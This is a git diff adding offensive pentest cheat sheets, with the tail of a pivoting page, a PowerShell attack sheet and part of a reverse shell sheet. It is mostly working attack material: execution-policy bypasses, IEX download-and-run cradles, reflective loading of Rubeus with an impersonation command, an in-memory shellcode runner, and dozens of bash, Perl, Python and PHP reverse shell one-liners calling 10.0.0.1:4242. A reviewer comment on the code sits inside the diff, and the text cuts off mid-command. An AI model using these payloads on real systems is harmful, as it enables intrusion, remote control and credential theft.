netsh trace stop + + # Event tracing can be also used across a reboots + netsh trace start capture=yes report=disabled persistent=yes tracefile=c:\trace.etl maxsize=16384 + + # To open the file in Wireshark you have to convert the etl file to the cap file format. Microsoft has written a convert for this task. Download the latest version. 
+ etl2pcapng.exe c:\trace.etl c:\trace.pcapng + + # Use filters + netsh trace start capture=yes report=disabled Ethernet.Type=IPv4 IPv4.Address=10.200.200.3 tracefile=c:\trace.etl maxsize=16384 + ``` +* Linux (tcpdump) + ```ps1 + sudo apt-get install tcpdump + tcpdump -w 0001.pcap -i eth0 + tcpdump -A -i eth0 + + # capture every TCP packet + tcpdump -i eth0 tcp + + # capture everything on port 22 + tcpdump -i eth0 port 22 + ``` + + +## Basic Pivoting Types + +| Type | Use Case | +| :------------- | :------------------------------------------ | +| Listen - Listen | Exposed asset, may not want to connect out. | +| Listen - Connect | Normal redirect. | +| Connect - Connect | Can’t bind, so connect to bridge two hosts | + +### Listen - Listen + +| Type | Use Case | +| :------------- | :------------------------------------------ | +| ncat | `ncat -v -l -p 8080 -c "ncat -v -l -p 9090"`| +| socat | `socat -v tcp-listen:8080 tcp-listen:9090` | +| remote host 1 | `ncat localhost 8080 < file` | +| remote host 2 | `ncat localhost 9090 > newfile` | + +### Listen - Connect + +| Type | Use Case | +| :------------- | :------------------------------------------ | +| ncat | `ncat -l -v -p 8080 -c "ncat localhost 9090"` | +| socat | `socat -v tcp-listen:8080,reuseaddr tcp-connect:localhost:9090` | +| remote host 1 | `ncat localhost -p 8080 < file` | +| remote host 2 | `ncat -l -p 9090 > newfile` | + +### Connect - Connect + +| Type | Use Case | +| :------------- | :------------------------------------------ | +| ncat | `ncat localhost 8080 -c "ncat localhost 9090"` | +| socat | `socat -v tcp-connect:localhost:8080,reuseaddr tcp-connect:localhost:9090` | +| remote host 1 | `ncat -l -p 8080 < file` | +| remote host 2 | `ncat -l -p 9090 > newfile` | + +## References + +* [Port Forwarding in Windows - Windows OS Hub](http://woshub.com/port-forwarding-in-windows/) +* [Using the SSH "Konami Code" (SSH Control Sequences) - Jeff 
McJunkin](https://pen-testing.sans.org/blog/2015/11/10/protected-using-the-ssh-konami-code-ssh-control-sequences) +* [A Red Teamer's guide to pivoting- Mar 23, 2017 - Artem Kondratenko](https://artkond.com/2017/03/23/pivoting-guide/) +* [Pivoting Meterpreter](https://www.information-security.fr/pivoting-meterpreter/) +* 🇫🇷 [Etat de l’art du pivoting rĂŠseau en 2019 - Oct 28,2019 - Alexandre ZANNI](https://cyberdefense.orange.com/fr/blog/etat-de-lart-du-pivoting-reseau-en-2019/) - 🇺🇸 [Overview of network pivoting and tunneling [2022 updated] - Alexandre ZANNI](https://blog.raw.pm/en/state-of-the-art-of-network-pivoting-in-2019/) +* [Red Team: Using SharpChisel to exfil internal network - Shantanu Khandelwal - Jun 8](https://medium.com/@shantanukhande/red-team-using-sharpchisel-to-exfil-internal-network-e1b07ed9b49) +* [Active Directory - hideandsec](https://hideandsec.sh/books/cheatsheets-82c/page/active-directory) +* [Windows: Capture a network trace with builtin tools (netsh) - February 22, 2021 Michael Albert](https://michlstechblog.info/blog/windows-capture-a-network-trace-with-builtin-tools-netsh/) \ No newline at end of file diff --git a/docs/pentest/Powershell - Cheatsheet.md b/docs/pentest/Powershell - Cheatsheet.md new file mode 100644 index 0000000..7695733 --- /dev/null +++ b/docs/pentest/Powershell - Cheatsheet.md 
@@ -0,0 +1,333 @@ +# Powershell + +## Summary + +- [Powershell](#powershell) + - [Summary](#summary) + - [Execution Policy](#execution-policy) + - [Encoded Commands](#encoded-commands) + - [Constrained Mode](#constrained-mode) + - [Encoded Commands](#encoded-commands) + - [Download file](#download-file) + - [Load Powershell scripts](#load-powershell-scripts) + - [Load C# assembly reflectively](#load-c-assembly-reflectively) + - [Call Win API using delegate functions with Reflection](#call-win-api-using-delegate-functions-with-reflection) + - [Resolve address functions](#resolve-address-functions) + - [DelegateType Reflection](#delegatetype-reflection) + - [Example with a simple shellcode runner](#example-with-a-simple-shellcode-runner) + - [Secure String to Plaintext](#secure-string-to-plaintext) + - [References](#references) + +## Execution Policy + +```ps1 +powershell -EncodedCommand $encodedCommand +powershell -ep bypass ./PowerView.ps1 + +# Change execution policy +Set-Executionpolicy -Scope CurrentUser -ExecutionPolicy UnRestricted +Set-ExecutionPolicy Bypass -Scope Process +``` + +## Constrained Mode + +```ps1 +# Check if we are in a constrained mode +# Values could be: FullLanguage or ConstrainedLanguage +$ExecutionContext.SessionState.LanguageMode + +## Bypass +powershell -version 2 +``` + +## Encoded Commands + +* Windows + ```ps1 + $command = 'IEX (New-Object Net.WebClient).DownloadString("http://10.10.10.10/PowerView.ps1")' + $bytes = [System.Text.Encoding]::Unicode.GetBytes($command) + $encodedCommand = [Convert]::ToBase64String($bytes) + ``` +* Linux: :warning: UTF-16LE encoding is required + ```ps1 + echo 'IEX (New-Object Net.WebClient).DownloadString("http://10.10.10.10/PowerView.ps1")' | iconv -t utf-16le | base64 -w 0 + ``` + +## Download file + +```ps1 +# Any version +(New-Object System.Net.WebClient).DownloadFile("http://10.10.10.10/PowerView.ps1", "C:\Windows\Temp\PowerView.ps1") +wget "http://10.10.10.10/taskkill.exe" -OutFile 
"C:\ProgramData\unifivideo\taskkill.exe" +Import-Module BitsTransfer; Start-BitsTransfer -Source $url -Destination $output + +# Powershell 4+ +IWR "http://10.10.10.10/binary.exe" -OutFile "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\binary.exe" +Invoke-WebRequest "http://10.10.10.10/binary.exe" -OutFile "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\binary.exe" +``` + +## Load Powershell scripts + +```ps1 +# Proxy-aware +IEX (New-Object Net.WebClient).DownloadString('http://10.10.10.10/PowerView.ps1') +echo IEX(New-Object Net.WebClient).DownloadString('http://10.10.10.10/PowerView.ps1') | powershell -noprofile - +powershell -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('http://10.10.10.10/PowerView.ps1')|iex" + +# Non-proxy aware +$h=new-object -com WinHttp.WinHttpRequest.5.1;$h.open('GET','http://10.10.10.10/PowerView.ps1',$false);$h.send();iex $h.responseText +``` + +## Load C# assembly reflectively + +```powershell +# Download and run assembly without arguments +$data = (New-Object System.Net.WebClient).DownloadData('http://10.10.16.7/rev.exe') +$assem = [System.Reflection.Assembly]::Load($data) +[rev.Program]::Main() + +# Download and run Rubeus, with arguments (make sure to split the args) +$data = (New-Object System.Net.WebClient).DownloadData('http://10.10.16.7/Rubeus.exe') +$assem = [System.Reflection.Assembly]::Load($data) +[Rubeus.Program]::Main("s4u /user:web01$ /rc4:1d77f43d9604e79e5626c6905705801e /impersonateuser:administrator /msdsspn:cifs/file01 /ptt".Split()) + +# Execute a specific method from an assembly (e.g. 
a DLL) +$data = (New-Object System.Net.WebClient).DownloadData('http://10.10.16.7/lib.dll') +$assem = [System.Reflection.Assembly]::Load($data) +$class = $assem.GetType("ClassLibrary1.Class1") +$method = $class.GetMethod("runner") +$method.Invoke(0, $null) +``` + +## Call Win API using delegate functions with Reflection + +### Resolve address functions + +To perform reflection we first need to obtain `GetModuleHandle` and `GetProcAdresse` to be able to lookup of Win32 API function addresses. + +To retrieve those function we will need to find out if there are included inside the existing loaded Assemblies. +```powershell +# Retrieve all loaded Assemblies +$Assemblies = [AppDomain]::CurrentDomain.GetAssemblies() + +Iterate over all the Assemblies, to retrieve all the Static and Unsafe Methods +$Assemblies | + ForEach-Object { + $_.GetTypes()| + ForEach-Object { + $_ | Get-Member -Static| Where-Object { + $_.TypeName.Contains('Unsafe') + } + } 2> $nul l +``` +We want to find where the Assemblies are located, so we will use the statement `Location`. Then we will look for all the methods inside the Assembly `Microsoft.Win32.UnsafeNativeMethods` +TBN: `GetModuleHandle` and `GetProcAddress` are located in `C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.dll` + +If we want to use those function we need in a first time get a reference to the .dll file we need the object to have the property `GlobalAssemblyCache` set (The Global Assembly Cache is essentially a list of all native and registered assemblies on Windows, which will allow us to filter out non-native assemblies). The second filter is to retrieve the `System.dll`. 
+```powershell +$systemdll = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { + $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll') +}) + +$unsafeObj = $systemdll.GetType('Microsoft.Win32.UnsafeNativeMethods') +``` + +To retrieve the method `GetModuleHandle`, we can use the method `GetMethod()` to retrieve it. +`$GetModuleHandle = $unsafeObj.GetMethod('GetModuleHandle')` + +Now we can use the `Invoke` method of our object `$GetModuleHandle` to get a reference of an unmanaged DLL. +Invoke takes two arguments and both are objects: +* The first argument is the object to invoke it on but since we use it on a static method we may set it to "$null". +* The second argument is an array consisting of the arguments for the method we are invoking (GetModuleHandle). Since the Win32 API only takes the name of the DLL as a string we only need to supply that. +`$GetModuleHandle.Invoke($null, @("user32.dll"))` + +However, we want to use the same method to use the function `GetProcAddress`, it won't work due to the fact that our `System.dll` object retrieved contains multiple occurences of the method `GetProcAddress`. Therefore the internal method `GetMethod()` will throw an error `"Ambiguous match found."`. + +Therefore we will use the method `GetMethods()` to get all the available methods and then iterate over them to retrieve only those we want. +```powershell +$unsafeObj.GetMethods() | ForEach-Object {If($_.Name -eq "GetProcAddress") {$_}} +``` + +If we want to get the `GetProcAddress` reference, we will construct an array to store our matching object and use the first entry. + +```powershell +$unsafeObj.GetMethods() | ForEach-Object {If($_.Name -eq "GetProcAddress") {$tmp+=$_}} +$GetProcAddress = $tmp[0] +``` + +We need to take the first one, because the arguments type of the second one does not match with ours. + +Alternatively we can use `GetMethod` function to precise the argument types that we want. 
+```powershell +$GetProcAddress = $unsafeObj.GetMethod('GetProcAddress', + [reflection.bindingflags]'Public,Static', + $null, + [System.Reflection.CallingConventions]::Any, + @([System.IntPtr], [string]), + $null); +``` +cf: [https://learn.microsoft.com/en-us/dotnet/api/system.type.getmethod?view=net-7.0](https://learn.microsoft.com/en-us/dotnet/api/system.type.getmethod?view=net-7.0) + +Now we have everything to resolve any function address we want. +```powershell +$user32 = $GetModuleHandle.Invoke($null, @("user32.dll")) +$tmp=@() +$unsafeObj.GetMethods() | ForEach-Object {If($_.Name -eq "GetProcAddress") {$tmp+=$_}} +$GetProcAddress = $tmp[0] +$GetProcAddress.Invoke($null, @($user32, "MessageBoxA")) +``` + +If we put everything in a function: +```powershell +function LookupFunc { + + Param ($moduleName, $functionName) + + $assem = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods') + $tmp=@() + $assem.GetMethods() | ForEach-Object {If($_.Name -eq "GetProcAddress") {$tmp+=$_}} + return $tmp[0].Invoke($null, @(($assem.GetMethod('GetModuleHandle')).Invoke($null, @($moduleName)), $functionName)) +} +``` + +### DelegateType Reflection + +To be able to use the function that we have retrieved the address, we need to pair the information about the number of arguments and their associated data types with the resolved function memory address. This is done through `DelegateType`. +The DelegateType Reflection consists in manually create an assembly in memory and populate it with content. + +The first step is to create a new assembly with the class `AssemblyName` and assign it a name. +```powershell +$MyAssembly = New-Object System.Reflection.AssemblyName('ReflectedDelegate') +``` +Now we want to set permission on our Assembly. We need to set it to executable and to not be saved to the disk. 
For that the method `DefineDynamicAssembly` will be used. +```powershell +$Domain = [AppDomain]::CurrentDomain +$MyAssemblyBuilder = $Domain.DefineDynamicAssembly($MyAssembly, [System.Reflection.Emit.AssemblyBuilderAccess]::Run) +``` +Now that everything is set, we can start creating content inside our assembly. First, we will need to create the main building block which is a Module. This can be done through the method `DefineDynamicModule` +The method need a custom name as the first argument and a boolean indicating if we want to include symbols or not. +```powershell +$MyModuleBuilder = $MyAssemblyBuilder.DefineDynamicModule('InMemoryModule', $false) +``` +The next step consists by creating a custom type that will become our delegate type. It can be done with the method `DefineType`. +The arguments are: +* a custom name +* the attributes of the type +* the type it build on top of +```powershell +$MyTypeBuilder = $MyModuleBuilder.DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate]) +``` +Then we will need to set the prototype of our function. +First we need to use the method `DefineConstructor` to define a constructor. The method takes three arguments: +* the attributes of the constructor +* calling convention +* the parameter types of the constructor that will become the function prototype +```powershell +$MyConstructorBuilder = $MyTypeBuilder.DefineConstructor('RTSpecialName, HideBySig, Public', + [System.Reflection.CallingConventions]::Standard, + @([IntPtr], [String], [String], [int])) +``` +Then we need to set some implementation flags with the method `SetImplementationFlags`. +```powershell +$MyConstructorBuilder.SetImplementationFlags('Runtime, Managed') +``` +To be able to call our function, we need to define the `Invoke` method in our delegate type. For that the method `DefineMethod` allows us to do that. 
+The method takes four arguments: +* name of the method defined +* method attributes +* return type +* array of argument types +```powershell +$MyMethodBuilder = $MyTypeBuilder.DefineMethod('Invoke', + 'Public, HideBySig, NewSlot, Virtual', + [int], + @([IntPtr], [String], [String], [int])) +``` +If we put everything in a function: +```powershell +function Get-Delegate +{ + Param ( + [Parameter(Position = 0, Mandatory = $True)] [IntPtr] $funcAddr, # Function address + [Parameter(Position = 1, Mandatory = $True)] [Type[]] $argTypes, # array with the argument types + [Parameter(Position = 2)] [Type] $retType = [Void] # Return type + ) + + $type = [AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('QD')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run). + DefineDynamicModule('QM', $false). + DefineType('QT', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate]) + $type.DefineConstructor('RTSpecialName, HideBySig, Public',[System.Reflection.CallingConventions]::Standard, $argTypes).SetImplementationFlags('Runtime, Managed') + $type.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $retType, $argTypes).SetImplementationFlags('Runtime, Managed') + $delegate = $type.CreateType() + + return [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($funcAddr, $delegate) +} +``` +### Example with a simple shellcode runner + +```powershell +# Create a Delegate function to be able to call the function that we have the address +function Get-Delegate +{ + Param ( + [Parameter(Position = 0, Mandatory = $True)] [IntPtr] $funcAddr, # Function address + [Parameter(Position = 1, Mandatory = $True)] [Type[]] $argTypes, # array with the argument types + [Parameter(Position = 2)] [Type] $retType = [Void] # Return type + ) + + $type = [AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('QD')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run). 
+ DefineDynamicModule('QM', $false). + DefineType('QT', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate]) + $type.DefineConstructor('RTSpecialName, HideBySig, Public',[System.Reflection.CallingConventions]::Standard, $argTypes).SetImplementationFlags('Runtime, Managed') + $type.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $retType, $argTypes).SetImplementationFlags('Runtime, Managed') + $delegate = $type.CreateType() + + return [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($funcAddr, $delegate) +} +# Allow to retrieve function address from a dll +function LookupFunc { + + Param ($moduleName, $functionName) + + $assem = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods') + $tmp=@() + $assem.GetMethods() | ForEach-Object {If($_.Name -eq "GetProcAddress") {$tmp+=$_}} + return $tmp[0].Invoke($null, @(($assem.GetMethod('GetModuleHandle')).Invoke($null, @($moduleName)), $functionName)) +} + +# Simple Shellcode runner using delegation +$VirtualAllocAddr = LookupFunc "Kernel32.dll" "VirtualAlloc" +$CreateThreadAddr = LookupFunc "Kernel32.dll" "CreateThread" +$WaitForSingleObjectAddr = LookupFunc "Kernel32.dll" "WaitForSingleObject" + + +$VirtualAlloc = Get-Delegate $VirtualAllocAddr @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr]) +$CreateThread = Get-Delegate $CreateThreadAddr @([IntPtr], [UInt32], [IntPtr], [IntPtr], [UInt32], [IntPtr]) ([IntPtr]) +$WaitForSingleObject = Get-Delegate $WaitForSingleObjectAddr @([IntPtr], [Int32]) ([Int]) + +[Byte[]] $buf = 0xfc,0x48,0x83,0xe4,0xf0 ... 
+ +$mem = $VirtualAlloc.Invoke([IntPtr]::Zero, $buf.Length, 0x3000, 0x40) +[System.Runtime.InteropServices.Marshal]::Copy($buf, 0, $mem, $buf.Length) +$hThread = $CreateThread.Invoke([IntPtr]::Zero, 0, $mem, [IntPtr]::Zero, 0, [IntPtr]::Zero) +$WaitForSingleObject.Invoke($hThread, 0xFFFFFFFF) + +``` + +## Secure String to Plaintext + +```ps1 +$pass = "01000000d08c9ddf0115d1118c7a00c04fc297eb01000000e4a07bc7aaeade47925c42c8be5870730000000002000000000003660000c000000010000000d792a6f34a55235c22da98b0c041ce7b0000000004800000a00000001000000065d20f0b4ba5367e53498f0209a3319420000000d4769a161c2794e19fcefff3e9c763bb3a8790deebf51fc51062843b5d52e40214000000ac62dab09371dc4dbfd763fea92b9d5444748692" | convertto-securestring +$user = "HTB\Tom" +$cred = New-Object System.management.Automation.PSCredential($user, $pass) +$cred.GetNetworkCredential() | fl +UserName : Tom +Password : 1ts-mag1c!!! +SecurePassword : System.Security.SecureString +Domain : HTB +``` + +## References + +* [Windows & Active Directory Exploitation Cheat Sheet and Command Reference - @chvancooten](https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference/) +* [Basic PowerShell for Pentesters - HackTricks](https://book.hacktricks.xyz/windows/basic-powershell-for-pentesters) \ No newline at end of file diff --git a/docs/pentest/Reverse Shell Cheatsheet.md b/docs/pentest/Reverse Shell Cheatsheet.md new file mode 100644 index 0000000..fe02072 --- /dev/null +++ b/docs/pentest/Reverse Shell Cheatsheet.md 
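Review bot: the step-by-step delegate walkthrough in this hunk stops right after `DefineMethod('Invoke', ...)` and never calls `SetImplementationFlags('Runtime, Managed')` on the method builder nor `CreateType()` on the type, so a reader who follows it line by line ends up with a `MyDelegateType` whose `Invoke` has no body and cannot be created; the `Get-Delegate` function below does both, so add the two missing lines to the walkthrough, e.g. `$MyMethodBuilder.SetImplementationFlags('Runtime, Managed')` followed by `$MyDelegateType = $MyTypeBuilder.CreateType()`. The `Get-Delegate` function is also pasted twice (once after "If we put everything in a function" and again at the top of the shellcode-runner example); keep a single definition and let the runner reference it. Under "Secure String to Plaintext", it is worth one sentence saying that the hex blob passed to `ConvertTo-SecureString` is DPAPI-protected and only decrypts as the user (and normally on the host) that produced it, otherwise readers will assume the exported standard string is portable.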
@@ -0,0 +1,620 @@ +# Reverse Shell Cheat Sheet + +## Summary + +* [Tools](#tools) +* [Reverse Shell](#reverse-shell) + * [Awk](#awk) + * [Automatic Reverse Shell Generator](#revshells) + * [Bash TCP](#bash-tcp) + * [Bash UDP](#bash-udp) + * [C](#c) + * [Dart](#dart) + * [Golang](#golang) + * [Groovy Alternative 1](#groovy-alternative-1) + * [Groovy](#groovy) + * [Java Alternative 1](#java-alternative-1) + * [Java Alternative 2](#java-alternative-2) + * [Java](#java) + * [Lua](#lua) + * [Ncat](#ncat) + * [Netcat OpenBsd](#netcat-openbsd) + * [Netcat BusyBox](#netcat-busybox) + * [Netcat Traditional](#netcat-traditional) + * [NodeJS](#nodejs) + * [OpenSSL](#openssl) + * [Perl](#perl) + * [PHP](#php) + * [Powershell](#powershell) + * [Python](#python) + * [Ruby](#ruby) + * [Rust](#rust) + * [Socat](#socat) + * [Telnet](#telnet) + * [War](#war) +* [Meterpreter Shell](#meterpreter-shell) + * [Windows Staged reverse TCP](#windows-staged-reverse-tcp) + * [Windows Stageless reverse TCP](#windows-stageless-reverse-tcp) + * [Linux Staged reverse TCP](#linux-staged-reverse-tcp) + * [Linux Stageless reverse TCP](#linux-stageless-reverse-tcp) + * [Other platforms](#other-platforms) +* [Spawn TTY Shell](#spawn-tty-shell) +* [References](#references) + +## Tools + +- [reverse-shell-generator](https://www.revshells.com/) - Hosted Reverse Shell generator ([source](https://github.com/0dayCTF/reverse-shell-generator)) ![image](https://user-images.githubusercontent.com/44453666/115149832-d6a75980-a033-11eb-9c50-56d4ea8ca57c.png) +- [revshellgen](https://github.com/t0thkr1s/revshellgen) - CLI Reverse Shell generator + +## Reverse Shell + +### Bash TCP + +```bash +bash -i >& /dev/tcp/10.0.0.1/4242 0>&1 + +0<&196;exec 196<>/dev/tcp/10.0.0.1/4242; sh <&196 >&196 2>&196 + +/bin/bash -l > /dev/tcp/10.0.0.1/4242 0<&1 2>&1 +``` + +### Bash UDP + +```bash +Victim: +sh -i >& /dev/udp/10.0.0.1/4242 0>&1 + +Listener: +nc -u -lvp 4242 +``` + +Don't forget to check with others shell : sh, ash, bsh, 
csh, ksh, zsh, pdksh, tcsh, bash + +### Socat + +```powershell +user@attack$ socat file:`tty`,raw,echo=0 TCP-L:4242 +user@victim$ /tmp/socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.0.1:4242 +``` +```powershell +user@victim$ wget -q https://github.com/andrew-d/static-binaries/raw/master/binaries/linux/x86_64/socat -O /tmp/socat; chmod +x /tmp/socat; /tmp/socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.0.1:4242 +``` + +Static socat binary can be found at [https://github.com/andrew-d/static-binaries](https://github.com/andrew-d/static-binaries/raw/master/binaries/linux/x86_64/socat) + +### Perl + +```perl +perl -e 'use Socket;$i="10.0.0.1";$p=4242;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};' + +perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"10.0.0.1:4242");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;' + + +NOTE: Windows only +perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"10.0.0.1:4242");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;' +``` + +### Python + +Linux only + +IPv4 +```python +export RHOST="10.0.0.1";export RPORT=4242;python -c 'import socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/sh")' +``` +```python +python -c 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",4242));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")' +``` +```python +python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",4242));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"])' +``` +```python +python -c 'import 
socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",4242));subprocess.call(["/bin/sh","-i"],stdin=s.fileno(),stdout=s.fileno(),stderr=s.fileno())' +``` + +IPv4 (No Spaces) +```python +python -c 'socket=__import__("socket");os=__import__("os");pty=__import__("pty");s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",4242));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")' +``` +```python +python -c 'socket=__import__("socket");subprocess=__import__("subprocess");os=__import__("os");s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",4242));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"])' +``` +```python +python -c 'socket=__import__("socket");subprocess=__import__("subprocess");s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",4242));subprocess.call(["/bin/sh","-i"],stdin=s.fileno(),stdout=s.fileno(),stderr=s.fileno())' +``` + +IPv4 (No Spaces, Shortened) +```python +python -c 'a=__import__;s=a("socket");o=a("os").dup2;p=a("pty").spawn;c=s.socket(s.AF_INET,s.SOCK_STREAM);c.connect(("10.0.0.1",4242));f=c.fileno;o(f(),0);o(f(),1);o(f(),2);p("/bin/sh")' +``` +```python +python -c 'a=__import__;b=a("socket");p=a("subprocess").call;o=a("os").dup2;s=b.socket(b.AF_INET,b.SOCK_STREAM);s.connect(("10.0.0.1",4242));f=s.fileno;o(f(),0);o(f(),1);o(f(),2);p(["/bin/sh","-i"])' +``` +```python +python -c 'a=__import__;b=a("socket");c=a("subprocess").call;s=b.socket(b.AF_INET,b.SOCK_STREAM);s.connect(("10.0.0.1",4242));f=s.fileno;c(["/bin/sh","-i"],stdin=f(),stdout=f(),stderr=f())' +``` + +IPv4 (No Spaces, Shortened Further) +```python +python -c 'a=__import__;s=a("socket").socket;o=a("os").dup2;p=a("pty").spawn;c=s();c.connect(("10.0.0.1",4242));f=c.fileno;o(f(),0);o(f(),1);o(f(),2);p("/bin/sh")' +``` +```python +python -c 
'a=__import__;b=a("socket").socket;p=a("subprocess").call;o=a("os").dup2;s=b();s.connect(("10.0.0.1",4242));f=s.fileno;o(f(),0);o(f(),1);o(f(),2);p(["/bin/sh","-i"])' +``` +```python +python -c 'a=__import__;b=a("socket").socket;c=a("subprocess").call;s=b();s.connect(("10.0.0.1",4242));f=s.fileno;c(["/bin/sh","-i"],stdin=f(),stdout=f(),stderr=f())' +``` + +IPv6 +```python +python -c 'import socket,os,pty;s=socket.socket(socket.AF_INET6,socket.SOCK_STREAM);s.connect(("dead:beef:2::125c",4242,0,2));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")' +``` + +IPv6 (No Spaces) +```python +python -c 'socket=__import__("socket");os=__import__("os");pty=__import__("pty");s=socket.socket(socket.AF_INET6,socket.SOCK_STREAM);s.connect(("dead:beef:2::125c",4242,0,2));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")' +``` + +IPv6 (No Spaces, Shortened) +```python +python -c 'a=__import__;c=a("socket");o=a("os").dup2;p=a("pty").spawn;s=c.socket(c.AF_INET6,c.SOCK_STREAM);s.connect(("dead:beef:2::125c",4242,0,2));f=s.fileno;o(f(),0);o(f(),1);o(f(),2);p("/bin/sh")' +``` + +Windows only (Python2) + +```powershell +python.exe -c "(lambda __y, __g, __contextlib: [[[[[[[(s.connect(('10.0.0.1', 4242)), [[[(s2p_thread.start(), [[(p2s_thread.start(), (lambda __out: (lambda __ctx: [__ctx.__enter__(), __ctx.__exit__(None, None, None), __out[0](lambda: None)][2])(__contextlib.nested(type('except', (), {'__enter__': lambda self: None, '__exit__': lambda __self, __exctype, __value, __traceback: __exctype is not None and (issubclass(__exctype, KeyboardInterrupt) and [True for __out[0] in [((s.close(), lambda after: after())[1])]][0])})(), type('try', (), {'__enter__': lambda self: None, '__exit__': lambda __self, __exctype, __value, __traceback: [False for __out[0] in [((p.wait(), (lambda __after: __after()))[1])]][0]})())))([None]))[1] for p2s_thread.daemon in [(True)]][0] for __g['p2s_thread'] in 
[(threading.Thread(target=p2s, args=[s, p]))]][0])[1] for s2p_thread.daemon in [(True)]][0] for __g['s2p_thread'] in [(threading.Thread(target=s2p, args=[s, p]))]][0] for __g['p'] in [(subprocess.Popen(['\\windows\\system32\\cmd.exe'], stdout=subprocess.PIPE, stderr=subprocess.STDOUT, stdin=subprocess.PIPE))]][0])[1] for __g['s'] in [(socket.socket(socket.AF_INET, socket.SOCK_STREAM))]][0] for __g['p2s'], p2s.__name__ in [(lambda s, p: (lambda __l: [(lambda __after: __y(lambda __this: lambda: (__l['s'].send(__l['p'].stdout.read(1)), __this())[1] if True else __after())())(lambda: None) for __l['s'], __l['p'] in [(s, p)]][0])({}), 'p2s')]][0] for __g['s2p'], s2p.__name__ in [(lambda s, p: (lambda __l: [(lambda __after: __y(lambda __this: lambda: [(lambda __after: (__l['p'].stdin.write(__l['data']), __after())[1] if (len(__l['data']) > 0) else __after())(lambda: __this()) for __l['data'] in [(__l['s'].recv(1024))]][0] if True else __after())())(lambda: None) for __l['s'], __l['p'] in [(s, p)]][0])({}), 's2p')]][0] for __g['os'] in [(__import__('os', __g, __g))]][0] for __g['socket'] in [(__import__('socket', __g, __g))]][0] for __g['subprocess'] in [(__import__('subprocess', __g, __g))]][0] for __g['threading'] in [(__import__('threading', __g, __g))]][0])((lambda f: (lambda x: x(x))(lambda y: f(lambda: y(y)()))), globals(), __import__('contextlib'))" +``` + +Windows only (Python3) + +```powershell +python.exe -c "import socket,os,threading,subprocess as sp;p=sp.Popen(['cmd.exe'],stdin=sp.PIPE,stdout=sp.PIPE,stderr=sp.STDOUT);s=socket.socket();s.connect(('10.0.0.1',4242));threading.Thread(target=exec,args=(\"while(True):o=os.read(p.stdout.fileno(),1024);s.send(o)\",globals()),daemon=True).start();threading.Thread(target=exec,args=(\"while(True):i=s.recv(1024);os.write(p.stdin.fileno(),i)\",globals())).start()" +``` + +### PHP + +```bash +php -r '$sock=fsockopen("10.0.0.1",4242);exec("/bin/sh -i <&3 >&3 2>&3");' +php -r 
